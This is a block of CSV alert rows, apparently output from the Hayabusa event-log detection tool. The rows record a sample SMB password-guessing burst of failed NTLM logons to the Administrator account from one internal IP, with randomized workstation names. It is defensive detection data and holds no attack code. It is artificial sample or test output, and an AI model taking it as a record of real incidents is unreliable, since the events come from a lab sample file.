+2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
